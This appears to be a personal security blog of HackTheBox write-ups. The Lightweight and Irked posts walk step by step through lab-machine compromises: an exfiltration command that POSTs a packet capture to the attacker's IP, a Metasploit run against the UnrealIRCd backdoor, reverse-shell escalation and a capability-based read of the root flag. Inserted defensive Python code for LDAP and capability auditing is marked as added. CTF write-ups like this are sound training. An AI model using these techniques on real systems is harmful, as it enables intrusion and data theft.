Friday, August 2, 2019

Post #26 - HackTheBox Write-Ups: Netmon & LaCasaDePapel

Hello! I'm sure you've noticed the blog has changed a bit. I'm still working on cleaning it, but hopefully the simplistic design will make it easier on the eyes!

I've been sick for a few weeks and was on vacation before that, so I actually wanted to drop a few lines letting everyone know that two more HackTheBox write-ups are live at 0x00sec: Netmon and LaCasa!

As always, I hope you enjoy! Leave me a comment here, reply to the forum thread, or hit me up on Twitter!

Stay safe out there!

Saturday, June 22, 2019

Post #25 - HackTheBox Write-Ups: Help & Querier

I made a mistake. Apparently, in all my rushing around to drop a HackTheBox write-up on 0x00sec a few weeks ago and then promote it via various channels, I didn't drop a post here as I normally do. Today, I intend to not only correct that mistake, but to drop a link to a second write-up that I just posted this weekend.

The first write-up was for Help. The second write-up was for Querier.

I hope you enjoy them. As always, follow me on Twitter or leave a comment here or on the article if you have any feedback or questions.

Thanks!

Saturday, May 11, 2019

Post #24 - HackTheBox Write-Up: Lightweight

And here we are again, yet another HackTheBox write-up. Once again this post is dropping directly on my blog because vict0ni took care of the 0x00sec write-up this week. Today, Lightweight is our target. We'll start, as we always do, with Nmap.

nmap -sC -sV -oA Lightweight 10.10.10.119

Explanations:

-sC - Script scanning using the default script list.

-sV - Attempts version detection of protocols/applications during scan.

-oA - Output files in all formats

Lightweight - The name of the files for -oA output.

10.10.10.119 - The target machine’s IP address.

We've got HTTP, SSH, and LDAP. Two of those services require credentials, so let's get started with some HTTP enumeration:

gobuster -u http://10.10.10.119 -w /usr/share/wordlists/dirb/small.txt -o Lightweight.gob.txt

Explanations:

-u - Specifies the URL to gobust.

-w - Specifies the wordlist to use for brute-forcing directories. I find that small.txt is a good, default starting point for me. If needed, I can work my way up to bigger wordlists, but it hasn’t been necessary for me up to this point.

-o - Specifies the output file name.

nikto -host 10.10.10.119 -port 80 -output Lightweight.nikto

Explanations:

-host - Specifies the target hostname/IP address.

-port - Specifies the target port number.

-output - Specifies the output file name.

As it turns out, both of these attempts failed. I sometimes have issues with my OpenVPN connection to HackTheBox, and at the time I attempted this box my wireless equipment was slowly dying, so I reset everything, then browsed to the website to make sure my connection to HTTP was fine.

...and then I read the website.

So, we can't use any brute-forcing tools. Noted. We can at least peruse the site. While doing so, we eventually discover a page that explains how we can use our IP as an SSH username and password to access the box. Let's get connected and see what we can find.

We have next to no rights on this box other than to our own home directory. I tried some of the usual stops here, such as Linenum and pspy, but to no avail. I ended up connecting to LDAP with no credentials, which let me see a few things, including password hashes for ldapuser1 and ldapuser2. I tried cracking these with both john and hashcat using rockyou.txt without success. I had to call in some major support from my teammates, and once again I learned another step I should be using in my investigation: packet captures.

Recall from our review of the machine that there is a certain page that lets us reset our password if needed. How could that take place? How could a webpage be reaching into the box to reset our password? Well, let's think about some of the protocols involved here. Of the protocols advertised, the one that deals with user accounts and their statuses is LDAP. With that in mind, we can set up a packet capture on the victim using tcpdump:

tcpdump 'port 389' -s 65535 -w ldap.pcap

Explanations:

'port 389' - Specifies the port for which we want to capture packets.

-s 65535 - Sets the capture size per packet (the snapshot length) to the maximum to ensure that packets will not be truncated.

-w ldap.pcap - Specifies the file to which we want to write our capture.

I let this run for a couple of minutes, then browsed to the reset page and allowed my password to be reset. Once again, I waited, this time for at least five minutes. Once done, I killed the capture. I transferred the .pcap file to my machine using scp (I was unable to successfully set up a reachable server on the victim machine). However, I also played around with another exfiltration technique that I thought I'd share: using POST requests with curl.

First, I set up a netcat listener on my attacking machine (you could set up a better HTTP server, specifically one that supports POST requests, which SimpleHTTPServer does not). I piped the output of this listener to a file:

nc -lp 2113 > ldap.pcap

Explanations:

-l - Listen mode.

-p 2113 - Specifies the port on which to listen.

Then, from the victim machine, I ran the below command:

curl -X POST -d @389.pcap http://10.10.14.41:2113/

Explanations:

-X - Specifies a request type.

POST - The request type for -X.

@389.pcap - The file to be posted, prepended with @.

Give the request a few moments to process, then kill your nc command. You can trim the file to edit out the HTTP portion of the request, or (and this works on the raw .pcap file, too) just run strings against the file and look for something interesting.

That's some awesome LDAP simple authentication bind info. What can we do with it, though? We can authenticate directly to LDAP, but our rights are no different than the non-authenticated session we had earlier. There has to be another angle.
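The defender's side of that capture, as an added example that is not part of the original write-up: an LDAP simple bind on port 389 carries the bind DN and password as plain BER-encoded bytes, so a sensor can flag it directly from the TCP payload (StartTLS or LDAPS removes the exposure). The DN, password and helper names below are constructed for illustration, and the finding reports only the password length.

```python
# Added example: flag cleartext LDAP simple binds in TCP payloads (port 389).
# Sample messages are constructed for illustration, not taken from the box.

def read_tlv(buf, pos):
    """Decode one BER element at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated value")
    return tag, buf[pos:pos + length], pos + length

def inspect_bind(payload):
    """Return a finding for an LDAP BindRequest, or None for anything else."""
    try:
        t_msg, msg, _ = read_tlv(payload, 0)      # LDAPMessage ::= SEQUENCE
        t_id, _, pos = read_tlv(msg, 0)           # messageID INTEGER
        t_op, bind, _ = read_tlv(msg, pos)        # [APPLICATION 0] BindRequest
        t_ver, _, pos = read_tlv(bind, 0)         # version INTEGER
        t_dn, dn, pos = read_tlv(bind, pos)       # name OCTET STRING (bind DN)
        t_auth, cred, _ = read_tlv(bind, pos)     # [0] simple or [3] sasl
    except ValueError:
        return None
    if (t_msg, t_id, t_op, t_ver, t_dn) != (0x30, 0x02, 0x60, 0x02, 0x04):
        return None
    method = {0x80: "simple", 0xA3: "sasl"}.get(t_auth, "unknown")
    return {
        "dn": dn.decode("utf-8", "replace"),
        "method": method,
        # An empty simple credential is an anonymous/unauthenticated bind.
        "cleartext_password": method == "simple" and len(cred) > 0,
        "password_length": len(cred) if method == "simple" else None,
    }

def tlv(tag, value):
    """Encode a short-form BER element (enough for the samples below)."""
    return bytes([tag, len(value)]) + value

def build_bind(dn, password):
    body = tlv(0x02, b"\x03") + tlv(0x04, dn) + tlv(0x80, password)
    return tlv(0x30, tlv(0x02, b"\x01") + tlv(0x60, body))

SAMPLE_SIMPLE = build_bind(b"uid=svc-example,ou=People,dc=example,dc=test",
                           b"constructed-secret")
SAMPLE_ANON = build_bind(b"", b"")

if __name__ == "__main__":
    for name, pkt in (("simple", SAMPLE_SIMPLE), ("anonymous", SAMPLE_ANON)):
        print(name, inspect_bind(pkt))
```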

I am embarrassed to say it, but this came down to some simple Linux knowledge of which I was not aware prior to this point. I've been using su for years, but I run most of my machines as root anyway (yes, I'm a terrible person, I know.) I was utterly unaware that su could be used to switch to any user account, but my wonderful backup squad at 0x00sec quickly corrected my knowledge gap. All that being said, I used su to switch to ldapuser2 with the simple password we captured in the authentication packet.

After all that work, we can finally grab the user flag. Once that's done, it's back to work.

If we take a look in the /home/ldapuser2 directory, we'll see a file named backup.7z. Once we've found this file, we can run file against it to confirm that it is, in fact, a .7z file.

I transfer the file to my machine to begin working on it. The first thing I do is try to unzip the file, but it is password-protected. A few quick Google searches (and some personal digging through memory) and I stumble upon 7z2hashcat.pl... which turns out to be irrelevant in this case.

I am not opposed to turning to the official HackTheBox forums in times of need, and a kind soul on there linked to bruteZip.sh.

bruteZip.sh backup.7z /usr/share/wordlists/dirb/small.txt

This tool did exactly the trick, and we now know the password for the archive:

Now we can extract the archive, and inside we find a multitude of files. However, the file I am interested in is status.php. Why? Think about your experience when browsing the site on port 80. Was there any page that took longer to load than the others? For me, it was the blacklist page, status.php. Reviewing the source for this .php file, we locate the credentials for ldapuser1:

Once again we can use su to switch user. Now that we're closer to root, we can start enumerating with the usual tools, starting with Linenum. I get a copy of Linenum transferred to the victim machine, run chmod +x to grant executable rights, and execute it, sending output to Linenum.txt (if you so choose.)

I had to read the output file over and over and over again before learning yet another new thing: POSIX capabilities. Per the ArchWiki:

"Capabilities (POSIX 1003.1e, capabilities(7)) provide fine-grained control over superuser permissions, allowing use of the root user to be avoided. Software developers are encouraged to replace uses of the powerful setuid attribute in a system binary with a more minimal set of capabilities."

All that is to say we can abuse binaries with capabilities to gain elevated code execution. Let's look at our specific example, openssl.

Okay, but what can we do with it? That all depends on the binary. In this case, we can read the man page for openssl to look for something useful:

Per the man page, "Encoding and Cipher Commands: The following aliases provide convenient access to the most used encodings and ciphers." So, here's the command I want to try:

./openssl base64 -in /root/root.txt

NOTE: the ./ is important. You want to make sure you are calling the openssl binary in /home/ldapuser1, not the binary in PATH.

...And that looks successful. Let's decode it now by echoing the base64 output to base64 -d:

We have root, and that concludes our attack on Lightweight. There was a lot to think about here, and the pattern for escalation was a bit different, but overall I enjoyed this box.
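For the administrator of a box like this one, the openssl finding is something a routine audit of file capabilities would surface. The following is an added example, not part of the original write-up: it triages the output of getcap -r / and flags binaries with a full or high-risk capability set, or with capabilities in a user-controlled directory. The sample output, the risk list and the directory list are constructed assumptions.

```python
import re

# Added example: triage `getcap -r /` output. The sample lines are constructed.
# Capabilities that allow reading/writing arbitrary files or becoming root.
HIGH_RISK = {"cap_dac_read_search", "cap_dac_override", "cap_setuid", "cap_setgid",
             "cap_sys_admin", "cap_sys_ptrace", "cap_chown", "cap_fowner"}
# Assumption: directories where an unprivileged user may own or replace files.
USER_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]*)[=+](?P<flags>[eip]*)$")

def parse_getcap_line(line):
    """Return (path, caps) where caps holds names that are effective or permitted.

    Handles both the older "path = cap_x+ep" and newer "path cap_x=ep" layouts;
    an empty name list such as "=ep" means every capability ("ALL").
    Paths containing spaces are not handled.
    """
    path, _, text = line.strip().partition(" ")
    caps = set()
    for clause in text.split():
        m = CLAUSE.match(clause)
        if not m or not (set(m["flags"]) & {"e", "p"}):
            continue  # bare "=" prefix, inheritable-only clause, or noise
        names = m["names"]
        caps |= {"ALL"} if names in ("", "all") else set(names.split(","))
    return path, caps

def audit(getcap_output):
    """Return [(path, [reasons])] for binaries that deserve a closer look."""
    findings = []
    for line in filter(str.strip, getcap_output.splitlines()):
        path, caps = parse_getcap_line(line)
        reasons = []
        if "ALL" in caps:
            reasons.append("full capability set, equivalent to root")
        risky = sorted(caps & HIGH_RISK)
        if risky:
            reasons.append("high-risk: " + ",".join(risky))
        if caps and path.startswith(USER_DIRS):
            reasons.append("capable binary in a user-controlled directory")
        if reasons:
            findings.append((path, reasons))
    return findings

SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/exampleuser/openssl =ep
/usr/local/bin/backup-reader cap_dac_read_search=ep
"""

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE):
        print(path, "->", "; ".join(reasons))
```

Once a flagged capability is confirmed unnecessary, setcap -r followed by the path removes it from the file.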

See you again soon!

Tuesday, April 30, 2019

Post #23 - HackTheBox Write-Up: Irked

Welcome to another HackTheBox write-up! I'm posting the full write-up here on my blog instead of on 0x00sec because my compatriot vict0ni posted a nice write-up this time around.

This round's box was Irked. Let's attack.

As always, I kick off an Nmap:

nmap -sC -sV -oA Irked 10.10.10.117

Explanations:

-sC - Script scanning using the default script list.

-sV - Attempts version detection of protocols/applications during scan.

-oA - Output files in all formats

Irked - The name of the files for -oA output.

10.10.10.117 - The target machine’s IP address.

Here's what we got:

I don't have any creds for ssh, so I decide to visit the webpage first to get an idea what's going on with this box. Before I do that, though, I kick off my secondary Nmap scan:

nmap -p- -T3 -oA Irked.full 10.10.10.117

Explanations:

-p- - Scan all ports, not just the most popular ones (scanning only the most popular ports is the default behavior of Nmap).

-T3 - Timing control, where -T1 is paranoid and slow and -T5 is insane and fast. I figure -T3 is a good middle ground for HTB, although realistically it probably doesn’t matter.

We'll come back to this. For now, let's get some more tools running while we review the webpage:

gobuster -u http://10.10.10.117 -w /usr/share/wordlists/dirb/small.txt -o Irked.gob.txt

Explanations:

-u - Specifies the URL to gobust.

-w - Specifies the wordlist to use for brute-forcing directories. I find that small.txt is a good, default starting point for me. If needed, I can work my way up to bigger wordlists, but it hasn’t been necessary for me up to this point.

-o - Specifies the output file name.

nikto -host 10.10.10.117 -port 80 -output Irked.nikto

Explanations:

-host - Specifies the target hostname/IP address.

-port - Specifies the target port number.

-output - Specifies the output file name.

Not much going on, so I visit the webpage in a browser.

Still not much happening there, either. I downloaded the image to search for metadata, but didn't find anything. The source of the page, while sparse, did provide us with the potential clue "IRC server coming soon!"

And as we return to our full Nmap scan, our confidence in this clue grows significantly:

We see IRC is running on TCP port 6697. I happen to have HexChat installed on my machine, so I load it up and connect to the IRC server. Upon connecting, I note the banner states the server is running Unreal IRC 3.2.8.1. I think it's time to consult searchsploit for possible exploits:

So there is a backdoor! Perfect! With that in mind, I prepare to fire up Metasploit, but before doing that I run searchsploit again to read the details of the exploit:

searchsploit -x exploits/linux/remote/16922.rb

This is not a very complicated exploit. Once we connect to the IRC server, we send AB;, which triggers the backdoor and allows us to execute code. We then execute our payload (in Metasploit we'll pick a reverse shell of some kind and set the payload option variable to that shell, but if we were exploiting manually we would literally just replace everything after AB; with our own code.)

With that in mind, let's get Metasploit armed and ready:

search unreal

use exploit/unix/irc/unreal_ircd_3281_backdoor

show options

set rhosts irked.htb

set rport 6697

show payloads

set payload cmd/unix/bind_perl

exploit

And we execute the exploit:

We're connected, but our shell is terrible. I spent a lot of time trying to poke at the things I thought I needed, but the limitations of the shell made it extremely difficult. As usual, the angel that is guly clued me in on a very standard trick for getting a better shell instantly:

python -c 'import pty; pty.spawn("/bin/bash")'

Explanations:

-c - Specifies that python should run the command inside the '' marks.

import pty - Tells python to import the pty module, which provides pseudo-terminal capabilities.

pty.spawn("/bin/bash") - Spawns a bash shell via pty.

Now we have a much better way of working with our foothold, so I start enumerating in earnest. It doesn't take long for me to spot the directory /home/djmardov/Documents. I am able to traverse into the directory, and I can see the user.txt file. However, I do not have permission to read it, so for now we'll leave it be. There is a hidden file named .backup that I am able to read.

Steganography. At last, my time has come. I know of only one thing that might hold something more than appeared at first glance; our irked.jpg file we grabbed from the webpage.

I chose to use steghide for this next part, and I ran it as follows (when prompted for the password, I provided UPupDOWNdownLRlrBAbaSSss):

steghide extract -sf irked.jpg

Explanations:

extract - Extract hidden data from the source file.

-sf - Specifies we are inputting a file that contains hidden data.

irked.jpg - The source file.

Once we've run the command, the file pass.txt is extracted. If we cat this file, we see a string:

This might be our password, so knowing the directory we found it in, let's turn to ssh to see if we can authenticate and get another shell:

And now we've got a shell as djmardov. Let's grab our user flag, then start enumerating.

I spent an eternity on this box after this point. I learned a lot about enumeration. I used a combination of this resource and the venerable (though new to me at time of working on this box) Linenum and pspy.

For Linenum, I ran it and just piped the output to Linenum.txt. The same goes for pspy (though because pspy listens until terminated, I tend to run it for at least five minutes to ensure I capture any processes that recur on a scheduled basis). On this box I ran pspy32s (the smaller, 32-bit version of pspy.) Pictured below is the portion of output from Linenum that held the key to our root path, although I completely missed it because I am still a noob when it comes to Linux privesc.

I ran file on viewuser and confirmed it is an ELF. I read the contents of the file (you can do this with, in my preferred order, strings, xxd, less, or cat) and noted this interesting bit:

I don't recognize that file, but my guess was that if I placed it in the given directory, something would happen. I had to fuss around a bit and first tried just a text file with commands in it, but then realized I needed to add #!/bin/bash to it. Then I got access denied, so I ran chmod +x on it. You can add whatever you want to the file to get code execution as root; I selected a python reverse shell:

I fire up a netcat listener on my attacking machine, then run /usr/bin/viewuser. My shell connects, and I run whoami to confirm that I am root. I then upgrade my shell again with python -c 'import pty; pty.spawn("/bin/bash")' before navigating to and grabbing the root flag.

That's it for this box. I enjoyed it quite a bit, even if it humbled me and taught me once again that my biggest weakness (and probably the most important part of CTF if not offsec as a whole) is enumeration.

Thanks for reading!

Saturday, April 13, 2019

INFO: Coerchck V0.2

If you recall my post from six months ago, I released a PowerShell script called Coerchck for iterating through /24 subnets to list all local administrator accounts on Windows machines.

I finally released version 0.2 today after many hours of delayed work. Sadly, however, my home-brew subnet calculator is still a little rough around the edges (a fact that weighs its shame heavily upon me, I assure you). Nevertheless, I wanted this tool available to not only myself but other security professionals who may find themselves in need of such a script. To that end I found a concise little function on TechNet with a license that would allow it to be added to my script.

Check out the updated repo here, and check out my explanatory post on 0x00sec.

Happy hunting!

Tuesday, April 2, 2019

Post #22 - HackTheBox Write-Up: Curling

Hello again!

I've posted another HackTheBox write-up; this round's box was Curling. You can find the box here, at 0x00sec.

As usual, drop me a comment here, on the forum post, or on Twitter.

See you soon with another box, and with an update to Coerchck!

Wednesday, March 13, 2019

Post #21 - HackTheBox Write-Up: Access

Greetings!

Still making minor tweaks to the blog that I will be uploading in the near future. I may also be moving to a new platform, but we'll see; I may just majorly overhaul the theme running on this blog.

Nevertheless, that is not why I am posting here today. I am, in fact, posting to link you to a write-up I did of a HackTheBox machine: Access. Access is not the first HTB machine I've pwned, but it is the first machine I've pwned that has since retired. As such, it became the first candidate for a write-up.

You can read the write-up over at 0x00sec, of which I am a member.

I hope you enjoy the write-up! Drop me a comment here, on the forum post, or on Twitter.

Thank you very much! Many exciting things ahead!